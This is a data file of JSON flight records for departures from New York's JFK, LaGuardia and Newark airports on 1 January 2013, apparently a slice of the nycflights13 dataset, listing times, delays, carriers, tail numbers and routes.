+{"year":2013,"month":1,"day":1,"dep_time":1130,"sched_dep_time":1131,"dep_delay":-1,"arr_time":1345,"sched_arr_time":1342,"arr_delay":3,"carrier":"DL","flight":2219,"tailnum":"N343NB","origin":"LGA","dest":"MSP","air_time":166,"distance":1020,"hour":11,"minute":31,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1132,"sched_dep_time":1135,"dep_delay":-3,"arr_time":1324,"sched_arr_time":1330,"arr_delay":-6,"carrier":"MQ","flight":4553,"tailnum":"N856MQ","origin":"LGA","dest":"CLE","air_time":89,"distance":419,"hour":11,"minute":35,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1133,"sched_dep_time":1129,"dep_delay":4,"arr_time":1440,"sched_arr_time":1437,"arr_delay":3,"carrier":"B6","flight":133,"tailnum":"N652JB","origin":"JFK","dest":"RSW","air_time":168,"distance":1074,"hour":11,"minute":29,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1133,"sched_dep_time":1130,"dep_delay":3,"arr_time":1448,"sched_arr_time":1450,"arr_delay":-2,"carrier":"VX","flight":409,"tailnum":"N839VA","origin":"JFK","dest":"LAX","air_time":347,"distance":2475,"hour":11,"minute":30,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1135,"sched_dep_time":1140,"dep_delay":-5,"arr_time":1429,"sched_arr_time":1445,"arr_delay":-16,"carrier":"AA","flight":1623,"tailnum":"N3EYAA","origin":"EWR","dest":"MIA","air_time":156,"distance":1085,"hour":11,"minute":40,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1137,"sched_dep_time":1140,"dep_delay":-3,"arr_time":1445,"sched_arr_time":1451,"arr_delay":-6,"carrier":"DL","flight":2175,"tailnum":"N999DN","origin":"LGA","dest":"PBI","air_time":153,"distance":1035,"hour":11,"minute":40,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1143,"sched_dep_time":1145,"dep_delay":-2,"arr_time":1512,"sched_arr_time":1507,"arr_delay":5,"carrier":"UA","flight":1010,"tailnum":"N39726","origin":"EWR","dest":"SNA","air_time":371,"distance":2434,"hour":11,"minute":45,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1144,"sched_dep_time":1145,"dep_delay":-1,"arr_time":1422,"sched_arr_time":1411,"arr_delay":11,"carrier":"EV","flight":4876,"tailnum":"N695CA","origin":"EWR","dest":"ATL","air_time":126,"distance":746,"hour":11,"minute":45,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1147,"sched_dep_time":1155,"dep_delay":-8,"arr_time":1335,"sched_arr_time":1327,"arr_delay":8,"carrier":"FL","flight":353,"tailnum":"N932AT","origin":"LGA","dest":"CAK","air_time":82,"distance":397,"hour":11,"minute":55,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1150,"sched_dep_time":1156,"dep_delay":-6,"arr_time":1302,"sched_arr_time":1314,"arr_delay":-12,"carrier":"EV","flight":4693,"tailnum":"N21144","origin":"EWR","dest":"SYR","air_time":46,"distance":195,"hour":11,"minute":56,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1153,"sched_dep_time":1159,"dep_delay":-6,"arr_time":1350,"sched_arr_time":1341,"arr_delay":9,"carrier":"EV","flight":4275,"tailnum":"N29917","origin":"EWR","dest":"CMH","air_time":95,"distance":463,"hour":11,"minute":59,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1153,"sched_dep_time":1123,"dep_delay":30,"arr_time":1454,"sched_arr_time":1425,"arr_delay":29,"carrier":"B6","flight":1,"tailnum":"N552JB","origin":"JFK","dest":"FLL","air_time":167,"distance":1069,"hour":11,"minute":23,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1153,"sched_dep_time":1200,"dep_delay":-7,"arr_time":1450,"sched_arr_time":1529,"arr_delay":-39,"carrier":"DL","flight":863,"tailnum":"N712TW","origin":"JFK","dest":"LAX","air_time":330,"distance":2475,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1154,"sched_dep_time":1200,"dep_delay":-6,"arr_time":1253,"sched_arr_time":1306,"arr_delay":-13,"carrier":"B6","flight":1174,"tailnum":"N206JB","origin":"EWR","dest":"BOS","air_time":40,"distance":200,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1154,"sched_dep_time":1200,"dep_delay":-6,"arr_time":1452,"sched_arr_time":1430,"arr_delay":22,"carrier":"MQ","flight":4658,"tailnum":"N8EGMQ","origin":"LGA","dest":"ATL","air_time":141,"distance":762,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1155,"sched_dep_time":1200,"dep_delay":-5,"arr_time":1517,"sched_arr_time":1510,"arr_delay":7,"carrier":"AA","flight":3,"tailnum":"N322AA","origin":"JFK","dest":"LAX","air_time":353,"distance":2475,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1155,"sched_dep_time":1200,"dep_delay":-5,"arr_time":1507,"sched_arr_time":1519,"arr_delay":-12,"carrier":"DL","flight":1443,"tailnum":"N969DL","origin":"LGA","dest":"FLL","air_time":160,"distance":1076,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1155,"sched_dep_time":1200,"dep_delay":-5,"arr_time":1441,"sched_arr_time":1440,"arr_delay":1,"carrier":"DL","flight":1947,"tailnum":"N904DL","origin":"LGA","dest":"ATL","air_time":133,"distance":762,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1155,"sched_dep_time":1200,"dep_delay":-5,"arr_time":1312,"sched_arr_time":1315,"arr_delay":-3,"carrier":"MQ","flight":4425,"tailnum":"N846MQ","origin":"JFK","dest":"DCA","air_time":57,"distance":213,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1157,"sched_dep_time":1158,"dep_delay":-1,"arr_time":1310,"sched_arr_time":1315,"arr_delay":-5,"carrier":"EV","flight":4511,"tailnum":"N16546","origin":"EWR","dest":"ROC","air_time":50,"distance":246,"hour":11,"minute":58,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1157,"sched_dep_time":1205,"dep_delay":-8,"arr_time":1342,"sched_arr_time":1345,"arr_delay":-3,"carrier":"MQ","flight":4431,"tailnum":"N723MQ","origin":"LGA","dest":"RDU","air_time":80,"distance":431,"hour":12,"minute":5,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1157,"sched_dep_time":1200,"dep_delay":-3,"arr_time":1452,"sched_arr_time":1456,"arr_delay":-4,"carrier":"UA","flight":1197,"tailnum":"N13113","origin":"EWR","dest":"MCO","air_time":151,"distance":937,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1158,"sched_dep_time":1205,"dep_delay":-7,"arr_time":1530,"sched_arr_time":1520,"arr_delay":10,"carrier":"AA","flight":743,"tailnum":"N426AA","origin":"LGA","dest":"DFW","air_time":248,"distance":1389,"hour":12,"minute":5,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1158,"sched_dep_time":1200,"dep_delay":-2,"arr_time":1256,"sched_arr_time":1300,"arr_delay":-4,"carrier":"WN","flight":1568,"tailnum":"N783SW","origin":"EWR","dest":"BWI","air_time":38,"distance":169,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1158,"sched_dep_time":1200,"dep_delay":-2,"arr_time":1338,"sched_arr_time":1331,"arr_delay":7,"carrier":"UA","flight":701,"tailnum":"N588UA","origin":"LGA","dest":"ORD","air_time":142,"distance":733,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1200,"sched_dep_time":1200,"dep_delay":0,"arr_time":1408,"sched_arr_time":1356,"arr_delay":12,"carrier":"US","flight":1443,"tailnum":"N755US","origin":"JFK","dest":"CLT","air_time":102,"distance":541,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1202,"sched_dep_time":1207,"dep_delay":-5,"arr_time":1318,"sched_arr_time":1314,"arr_delay":4,"carrier":"EV","flight":4347,"tailnum":"N11536","origin":"EWR","dest":"BTV","air_time":51,"distance":266,"hour":12,"minute":7,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1202,"sched_dep_time":1159,"dep_delay":3,"arr_time":1645,"sched_arr_time":1653,"arr_delay":-8,"carrier":"UA","flight":1663,"tailnum":"N38403","origin":"EWR","dest":"SJU","air_time":187,"distance":1608,"hour":11,"minute":59,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1203,"sched_dep_time":1205,"dep_delay":-2,"arr_time":1501,"sched_arr_time":1437,"arr_delay":24,"carrier":"EV","flight":3850,"tailnum":"N13978","origin":"EWR","dest":"ATL","air_time":142,"distance":746,"hour":12,"minute":5,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1203,"sched_dep_time":1200,"dep_delay":3,"arr_time":1519,"sched_arr_time":1545,"arr_delay":-26,"carrier":"VX","flight":25,"tailnum":"N843VA","origin":"JFK","dest":"SFO","air_time":353,"distance":2586,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1204,"sched_dep_time":1200,"dep_delay":4,"arr_time":1500,"sched_arr_time":1448,"arr_delay":12,"carrier":"B6","flight":523,"tailnum":"N612JB","origin":"EWR","dest":"MCO","air_time":139,"distance":937,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1205,"sched_dep_time":1200,"dep_delay":5,"arr_time":1503,"sched_arr_time":1505,"arr_delay":-2,"carrier":"UA","flight":1461,"tailnum":"N39418","origin":"EWR","dest":"IAH","air_time":221,"distance":1400,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1206,"sched_dep_time":1209,"dep_delay":-3,"arr_time":1325,"sched_arr_time":1328,"arr_delay":-3,"carrier":"EV","flight":4216,"tailnum":"N14168","origin":"EWR","dest":"BUF","air_time":59,"distance":282,"hour":12,"minute":9,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1208,"sched_dep_time":1158,"dep_delay":10,"arr_time":1540,"sched_arr_time":1502,"arr_delay":38,"carrier":"B6","flight":625,"tailnum":"N239JB","origin":"JFK","dest":"HOU","air_time":253,"distance":1428,"hour":11,"minute":58,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1211,"sched_dep_time":1215,"dep_delay":-4,"arr_time":1423,"sched_arr_time":1413,"arr_delay":10,"carrier":"EV","flight":4135,"tailnum":"N21537","origin":"EWR","dest":"CLT","air_time":102,"distance":529,"hour":12,"minute":15,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1217,"sched_dep_time":1220,"dep_delay":-3,"arr_time":1414,"sched_arr_time":1350,"arr_delay":24,"carrier":"MQ","flight":3697,"tailnum":"N517MQ","origin":"EWR","dest":"ORD","air_time":143,"distance":719,"hour":12,"minute":20,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1217,"sched_dep_time":1218,"dep_delay":-1,"arr_time":1525,"sched_arr_time":1529,"arr_delay":-4,"carrier":"UA","flight":391,"tailnum":"N573UA","origin":"EWR","dest":"SFO","air_time":345,"distance":2565,"hour":12,"minute":18,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1219,"sched_dep_time":1220,"dep_delay":-1,"arr_time":1415,"sched_arr_time":1415,"arr_delay":0,"carrier":"AA","flight":1757,"tailnum":"N545AA","origin":"LGA","dest":"STL","air_time":161,"distance":888,"hour":12,"minute":20,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1219,"sched_dep_time":1225,"dep_delay":-6,"arr_time":1451,"sched_arr_time":1500,"arr_delay":-9,"carrier":"DL","flight":1715,"tailnum":"N342NB","origin":"LGA","dest":"MSY","air_time":195,"distance":1183,"hour":12,"minute":25,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1220,"sched_dep_time":1220,"dep_delay":0,"arr_time":1403,"sched_arr_time":1340,"arr_delay":23,"carrier":"WN","flight":133,"tailnum":"N254WN","origin":"EWR","dest":"MDW","air_time":142,"distance":711,"hour":12,"minute":20,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1222,"sched_dep_time":1159,"dep_delay":23,"arr_time":1512,"sched_arr_time":1429,"arr_delay":43,"carrier":"EV","flight":4679,"tailnum":"N14916","origin":"EWR","dest":"JAX","air_time":131,"distance":820,"hour":11,"minute":59,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1222,"sched_dep_time":1229,"dep_delay":-7,"arr_time":1520,"sched_arr_time":1526,"arr_delay":-6,"carrier":"B6","flight":27,"tailnum":"N192JB","origin":"JFK","dest":"TPA","air_time":160,"distance":1005,"hour":12,"minute":29,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1228,"sched_dep_time":1224,"dep_delay":4,"arr_time":1631,"sched_arr_time":1604,"arr_delay":27,"carrier":"UA","flight":1114,"tailnum":"N38459","origin":"EWR","dest":"PHX","air_time":339,"distance":2133,"hour":12,"minute":24,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1230,"sched_dep_time":1235,"dep_delay":-5,"arr_time":1440,"sched_arr_time":1438,"arr_delay":2,"carrier":"EV","flight":5311,"tailnum":"N741EV","origin":"EWR","dest":"DTW","air_time":108,"distance":488,"hour":12,"minute":35,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1231,"sched_dep_time":1238,"dep_delay":-7,"arr_time":1449,"sched_arr_time":1446,"arr_delay":3,"carrier":"DL","flight":1131,"tailnum":"N920DL","origin":"LGA","dest":"DTW","air_time":108,"distance":502,"hour":12,"minute":38,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1231,"sched_dep_time":1229,"dep_delay":2,"arr_time":1523,"sched_arr_time":1529,"arr_delay":-6,"carrier":"UA","flight":428,"tailnum":"N402UA","origin":"EWR","dest":"FLL","air_time":156,"distance":1065,"hour":12,"minute":29,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1237,"sched_dep_time":1245,"dep_delay":-8,"arr_time":1340,"sched_arr_time":1350,"arr_delay":-10,"carrier":"AA","flight":1850,"tailnum":"N3EGAA","origin":"JFK","dest":"BOS","air_time":40,"distance":187,"hour":12,"minute":45,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1238,"sched_dep_time":1240,"dep_delay":-2,"arr_time":1410,"sched_arr_time":1405,"arr_delay":5,"carrier":"WN","flight":564,"tailnum":"N297WN","origin":"LGA","dest":"MKE","air_time":137,"distance":738,"hour":12,"minute":40,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1240,"sched_dep_time":1229,"dep_delay":11,"arr_time":1451,"sched_arr_time":1428,"arr_delay":23,"carrier":"EV","flight":4118,"tailnum":"N14543","origin":"EWR","dest":"DTW","air_time":114,"distance":488,"hour":12,"minute":29,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1240,"sched_dep_time":1245,"dep_delay":-5,"arr_time":1554,"sched_arr_time":1600,"arr_delay":-6,"carrier":"AA","flight":2253,"tailnum":"N3BUAA","origin":"LGA","dest":"MIA","air_time":156,"distance":1096,"hour":12,"minute":45,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1240,"sched_dep_time":1235,"dep_delay":5,"arr_time":1415,"sched_arr_time":1415,"arr_delay":0,"carrier":"MQ","flight":4404,"tailnum":"N828MQ","origin":"JFK","dest":"RDU","air_time":79,"distance":427,"hour":12,"minute":35,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1241,"sched_dep_time":1247,"dep_delay":-6,"arr_time":1342,"sched_arr_time":1355,"arr_delay":-13,"carrier":"EV","flight":4129,"tailnum":"N36915","origin":"EWR","dest":"DCA","air_time":45,"distance":199,"hour":12,"minute":47,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1245,"sched_dep_time":1245,"dep_delay":0,"arr_time":1616,"sched_arr_time":1615,"arr_delay":1,"carrier":"DL","flight":2174,"tailnum":"N711ZX","origin":"JFK","dest":"SLC","air_time":298,"distance":1990,"hour":12,"minute":45,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1245,"sched_dep_time":1249,"dep_delay":-4,"arr_time":1722,"sched_arr_time":1800,"arr_delay":-38,"carrier":"DL","flight":315,"tailnum":"N670DN","origin":"JFK","dest":"SJU","air_time":188,"distance":1598,"hour":12,"minute":49,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1246,"sched_dep_time":1225,"dep_delay":21,"arr_time":1424,"sched_arr_time":1348,"arr_delay":36,"carrier":"B6","flight":66,"tailnum":"N228JB","origin":"JFK","dest":"BUF","air_time":70,"distance":301,"hour":12,"minute":25,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1248,"sched_dep_time":1250,"dep_delay":-2,"arr_time":1607,"sched_arr_time":1607,"arr_delay":0,"carrier":"UA","flight":1280,"tailnum":"N26210","origin":"LGA","dest":"IAH","air_time":238,"distance":1416,"hour":12,"minute":50,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1251,"sched_dep_time":1252,"dep_delay":-1,"arr_time":1611,"sched_arr_time":1555,"arr_delay":16,"carrier":"B6","flight":85,"tailnum":"N657JB","origin":"JFK","dest":"FLL","air_time":173,"distance":1069,"hour":12,"minute":52,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1252,"sched_dep_time":1245,"dep_delay":7,"arr_time":1624,"sched_arr_time":1550,"arr_delay":34,"carrier":"AA","flight":745,"tailnum":"N3FTAA","origin":"LGA","dest":"DFW","air_time":243,"distance":1389,"hour":12,"minute":45,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1253,"sched_dep_time":1212,"dep_delay":41,"arr_time":1524,"sched_arr_time":1436,"arr_delay":48,"carrier":"UA","flight":754,"tailnum":"N576UA","origin":"EWR","dest":"DEN","air_time":252,"distance":1605,"hour":12,"minute":12,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1255,"sched_dep_time":1300,"dep_delay":-5,"arr_time":1541,"sched_arr_time":1537,"arr_delay":4,"carrier":"DL","flight":781,"tailnum":"N644DL","origin":"LGA","dest":"ATL","air_time":132,"distance":762,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1255,"sched_dep_time":1255,"dep_delay":0,"arr_time":1540,"sched_arr_time":1535,"arr_delay":5,"carrier":"WN","flight":1251,"tailnum":"N732SW","origin":"LGA","dest":"DEN","air_time":264,"distance":1620,"hour":12,"minute":55,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1255,"sched_dep_time":1200,"dep_delay":55,"arr_time":1451,"sched_arr_time":1330,"arr_delay":81,"carrier":"MQ","flight":4601,"tailnum":"N518MQ","origin":"LGA","dest":"BNA","air_time":139,"distance":764,"hour":12,"minute":0,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1255,"sched_dep_time":1259,"dep_delay":-4,"arr_time":1501,"sched_arr_time":1502,"arr_delay":-1,"carrier":"US","flight":1459,"tailnum":"N540UW","origin":"LGA","dest":"CLT","air_time":100,"distance":544,"hour":12,"minute":59,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1255,"sched_dep_time":1300,"dep_delay":-5,"arr_time":1401,"sched_arr_time":1409,"arr_delay":-8,"carrier":"US","flight":2128,"tailnum":"N957UW","origin":"LGA","dest":"BOS","air_time":38,"distance":184,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1257,"sched_dep_time":1258,"dep_delay":-1,"arr_time":1601,"sched_arr_time":1610,"arr_delay":-9,"carrier":"B6","flight":209,"tailnum":"N793JB","origin":"JFK","dest":"LGB","air_time":346,"distance":2465,"hour":12,"minute":58,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1257,"sched_dep_time":1300,"dep_delay":-3,"arr_time":1454,"sched_arr_time":1450,"arr_delay":4,"carrier":"MQ","flight":4426,"tailnum":"N739MQ","origin":"LGA","dest":"CMH","air_time":97,"distance":479,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1258,"sched_dep_time":1308,"dep_delay":-10,"arr_time":1532,"sched_arr_time":1537,"arr_delay":-5,"carrier":"FL","flight":348,"tailnum":"N717JL","origin":"LGA","dest":"ATL","air_time":128,"distance":762,"hour":13,"minute":8,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1258,"sched_dep_time":1300,"dep_delay":-2,"arr_time":1459,"sched_arr_time":1440,"arr_delay":19,"carrier":"AA","flight":329,"tailnum":"N511AA","origin":"LGA","dest":"ORD","air_time":147,"distance":733,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1301,"sched_dep_time":1240,"dep_delay":21,"arr_time":1633,"sched_arr_time":1540,"arr_delay":53,"carrier":"AA","flight":1853,"tailnum":"N544AA","origin":"EWR","dest":"DFW","air_time":252,"distance":1372,"hour":12,"minute":40,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1301,"sched_dep_time":1150,"dep_delay":71,"arr_time":1518,"sched_arr_time":1345,"arr_delay":93,"carrier":"MQ","flight":4646,"tailnum":"N542MQ","origin":"LGA","dest":"MSP","air_time":170,"distance":1020,"hour":11,"minute":50,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1301,"sched_dep_time":1255,"dep_delay":6,"arr_time":1629,"sched_arr_time":1603,"arr_delay":26,"carrier":"UA","flight":765,"tailnum":"N825UA","origin":"EWR","dest":"DFW","air_time":243,"distance":1372,"hour":12,"minute":55,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1302,"sched_dep_time":1259,"dep_delay":3,"arr_time":1402,"sched_arr_time":1404,"arr_delay":-2,"carrier":"B6","flight":1006,"tailnum":"N273JB","origin":"JFK","dest":"BOS","air_time":40,"distance":187,"hour":12,"minute":59,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1302,"sched_dep_time":1300,"dep_delay":2,"arr_time":1553,"sched_arr_time":1601,"arr_delay":-8,"carrier":"UA","flight":1435,"tailnum":"N78511","origin":"EWR","dest":"MIA","air_time":158,"distance":1085,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1304,"sched_dep_time":1227,"dep_delay":37,"arr_time":1518,"sched_arr_time":1422,"arr_delay":56,"carrier":"EV","flight":4640,"tailnum":"N19966","origin":"EWR","dest":"DAY","air_time":107,"distance":533,"hour":12,"minute":27,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1304,"sched_dep_time":1259,"dep_delay":5,"arr_time":1430,"sched_arr_time":1418,"arr_delay":12,"carrier":"B6","flight":32,"tailnum":"N346JB","origin":"JFK","dest":"ROC","air_time":65,"distance":264,"hour":12,"minute":59,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1305,"sched_dep_time":1315,"dep_delay":-10,"arr_time":1523,"sched_arr_time":1520,"arr_delay":3,"carrier":"MQ","flight":4564,"tailnum":"N725MQ","origin":"LGA","dest":"DTW","air_time":102,"distance":502,"hour":13,"minute":15,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1306,"sched_dep_time":1240,"dep_delay":26,"arr_time":1622,"sched_arr_time":1555,"arr_delay":27,"carrier":"AA","flight":2041,"tailnum":"N5DMAA","origin":"JFK","dest":"MIA","air_time":163,"distance":1089,"hour":12,"minute":40,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1306,"sched_dep_time":1300,"dep_delay":6,"arr_time":1622,"sched_arr_time":1610,"arr_delay":12,"carrier":"WN","flight":2596,"tailnum":"N773SA","origin":"EWR","dest":"HOU","air_time":239,"distance":1411,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1310,"sched_dep_time":1300,"dep_delay":10,"arr_time":1559,"sched_arr_time":1554,"arr_delay":5,"carrier":"B6","flight":991,"tailnum":"N593JB","origin":"JFK","dest":"PBI","air_time":150,"distance":1028,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1314,"sched_dep_time":1315,"dep_delay":-1,"arr_time":1507,"sched_arr_time":1505,"arr_delay":2,"carrier":"US","flight":1615,"tailnum":"N177US","origin":"EWR","dest":"CLT","air_time":95,"distance":529,"hour":13,"minute":15,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1315,"sched_dep_time":1317,"dep_delay":-2,"arr_time":1413,"sched_arr_time":1423,"arr_delay":-10,"carrier":"EV","flight":4112,"tailnum":"N13538","origin":"EWR","dest":"ALB","air_time":33,"distance":143,"hour":13,"minute":17,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1316,"sched_dep_time":1314,"dep_delay":2,"arr_time":1412,"sched_arr_time":1415,"arr_delay":-3,"carrier":"EV","flight":4340,"tailnum":"N11551","origin":"EWR","dest":"BWI","air_time":38,"distance":169,"hour":13,"minute":14,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1317,"sched_dep_time":1325,"dep_delay":-8,"arr_time":1454,"sched_arr_time":1505,"arr_delay":-11,"carrier":"MQ","flight":4475,"tailnum":"N711MQ","origin":"LGA","dest":"RDU","air_time":80,"distance":431,"hour":13,"minute":25,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1318,"sched_dep_time":1322,"dep_delay":-4,"arr_time":1358,"sched_arr_time":1416,"arr_delay":-18,"carrier":"EV","flight":4106,"tailnum":"N19554","origin":"EWR","dest":"BDL","air_time":25,"distance":116,"hour":13,"minute":22,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1320,"sched_dep_time":1315,"dep_delay":5,"arr_time":1602,"sched_arr_time":1605,"arr_delay":-3,"carrier":"B6","flight":393,"tailnum":"N537JB","origin":"LGA","dest":"MCO","air_time":140,"distance":950,"hour":13,"minute":15,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1320,"sched_dep_time":1320,"dep_delay":0,"arr_time":1625,"sched_arr_time":1636,"arr_delay":-11,"carrier":"UA","flight":1425,"tailnum":"N58101","origin":"EWR","dest":"LAX","air_time":334,"distance":2454,"hour":13,"minute":20,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1323,"sched_dep_time":1300,"dep_delay":23,"arr_time":1651,"sched_arr_time":1608,"arr_delay":43,"carrier":"DL","flight":1185,"tailnum":"N3736C","origin":"EWR","dest":"SLC","air_time":295,"distance":1969,"hour":13,"minute":0,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1325,"sched_dep_time":1330,"dep_delay":-5,"arr_time":1606,"sched_arr_time":1605,"arr_delay":1,"carrier":"DL","flight":2043,"tailnum":"N318US","origin":"JFK","dest":"ATL","air_time":131,"distance":760,"hour":13,"minute":30,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1327,"sched_dep_time":1330,"dep_delay":-3,"arr_time":1638,"sched_arr_time":1655,"arr_delay":-17,"carrier":"VX","flight":411,"tailnum":"N642VA","origin":"JFK","dest":"LAX","air_time":352,"distance":2475,"hour":13,"minute":30,"time_hour":"2013-01-01 13:00:00"} 